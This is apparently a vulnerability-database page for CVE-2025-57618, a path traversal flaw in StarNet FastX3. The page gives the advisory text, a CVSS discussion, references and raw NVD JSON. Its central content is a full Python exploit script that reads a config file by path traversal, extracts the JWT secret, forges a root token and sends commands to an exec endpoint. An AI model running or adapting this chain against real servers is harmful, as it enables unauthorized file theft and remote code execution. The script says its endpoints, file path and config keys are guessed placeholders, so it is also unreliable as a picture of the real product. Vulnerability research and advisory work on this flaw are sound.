Security Vulnerability Report
CVE-2025-57618 CVSS 7.3 HIGH

Published: 2025-10-14 18:15:36
Last Modified: 2026-04-15 00:35:42

Description

A path traversal vulnerability in FastX3 through 3.3.67 allows an unauthenticated attacker to read arbitrary files on the server. By leveraging this vulnerability, it is possible to access the application's configuration files, which contain the secret key used to sign JSON Web Tokens as well as existing JTIs. With this information, an attacker can forge valid JWTs, impersonate the root user, and achieve remote code execution in a privileged context via authenticated endpoints.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Note: this is a secondary-source score (see the raw JSON below), and its Low confidentiality, integrity and availability impacts do not match the description, which claims arbitrary file read and root-level remote code execution. Under CVSS 3.1 those impacts would be rated High (C:H/I:H/A:H, base score 9.8), so treat 7.3 as a floor when prioritising.

Configurations (Affected Products)

StarNet FastX3 <= 3.3.67 (derived from the description; the NVD record carries no CPE configuration data)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-57618 - FastX3 Path Traversal to RCE Exploit
# Exploit chain: Path Traversal -> JWT Secret Disclosure -> JWT Forgery -> RCE
#
# Caveat: the download endpoint, the config file path, the config keys and the
# /api/v1/exec endpoint used below are placeholders. None of them is documented
# by the advisory or the references on this page; adjust them to the real target.
import argparse
import json
from datetime import datetime, timedelta, timezone

import jwt  # PyJWT
import requests

# Path traversal payload (placeholder location of the FastX3 config file)
CONFIG_FILE_PATH = "../../../../etc/starnet/fastx3/config.json"


def exploit_path_traversal(target_url, file_path):
    """Step 1: exploit the path traversal to read an arbitrary file."""
    url = f"{target_url}/download?file={file_path}"
    print(f"[*] Attempting path traversal: {url}")
    response = requests.get(url, verify=False)
    if response.status_code == 200:
        print("[+] File content retrieved successfully")
        return response.text
    print(f"[-] Failed with status code: {response.status_code}")
    return None


def extract_jwt_secret(config_content):
    """Step 2: pull the JWT signing secret and the issued JTIs out of the config."""
    try:
        config = json.loads(config_content)
    except json.JSONDecodeError:
        print("[-] Failed to parse config file")
        return None, None
    secret_key = config.get("jwt_secret", "")
    jti_list = config.get("jti_list", [])
    print(f"[+] JWT Secret: {secret_key}")
    print(f"[+] JTI List: {jti_list}")
    return secret_key, jti_list


def forge_jwt_token(secret_key, jti_list, username="root"):
    """Step 3: forge a JWT for the root user with the leaked secret.

    The description says the config also leaks the existing JTIs. If the server
    only honours JTIs it issued itself, a made-up jti is rejected, so reuse a
    leaked one whenever the config provided any.
    """
    now = datetime.now(timezone.utc)
    payload = {
        "sub": username,
        "name": username,
        "iat": now,
        "exp": now + timedelta(hours=24),
        "jti": jti_list[0] if jti_list else "forged-jti-token-001",
    }
    # Sign the JWT with the leaked secret key
    token = jwt.encode(payload, secret_key, algorithm="HS256")
    print(f"[+] Forged JWT token: {token}")
    return token


def execute_rce(target_url, token, command):
    """Step 4: call a privileged, authenticated endpoint with the forged token."""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    payload = {"command": command, "args": ""}
    url = f"{target_url}/api/v1/exec"
    print(f"[*] Sending RCE payload to: {url}")
    response = requests.post(url, headers=headers, json=payload, verify=False)
    if response.status_code == 200:
        print(f"[+] RCE successful! Output: {response.text}")
        return response.text
    print(f"[-] RCE failed with status: {response.status_code}")
    return None


def main():
    parser = argparse.ArgumentParser(description="CVE-2025-57618 FastX3 Exploit")
    parser.add_argument("--target", required=True, help="Target FastX3 server URL")
    parser.add_argument("--command", default="id", help="Command to execute")
    args = parser.parse_args()

    # Step 1: path traversal to read the config
    config_content = exploit_path_traversal(args.target, CONFIG_FILE_PATH)
    if not config_content:
        return
    # Step 2: extract the JWT secret and the issued JTIs
    secret_key, jti_list = extract_jwt_secret(config_content)
    if not secret_key:
        return
    # Step 3: forge the JWT
    forged_token = forge_jwt_token(secret_key, jti_list)
    # Step 4: execute the command through the authenticated endpoint
    execute_rce(args.target, forged_token, args.command)


if __name__ == "__main__":
    main()

References

https://gitlab.com/daniele_m/cve-list/-/blob/main/README.md?ref_type=heads
https://www.starnet.com/fastx/
https://www.starnet.com/help/fastx3-3-server-release-notes/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57618", "sourceIdentifier": "[email protected]", "published": "2025-10-14T18:15:36.190", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal vulnerability in FastX3 thru 3.3.67 allows an unauthenticated attacker to read arbitrary files on the server. By leveraging this vulnerability, it is possible to access the application's configuration files, which contain the secret key used to sign JSON Web Tokens as well as existing JTIs. With this information, an attacker can forge valid JWTs, impersonate the root user, and achieve remote code execution in privileged context via authenticated endpoints."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-24"}]}], "references": [{"url": "https://gitlab.com/daniele_m/cve-list/-/blob/main/README.md?ref_type=heads", "source": "[email protected]"}, {"url": "https://www.starnet.com/fastx/", "source": "[email protected]"}, {"url": "https://www.starnet.com/help/fastx3-3-server-release-notes/", "source": "[email protected]"}]}}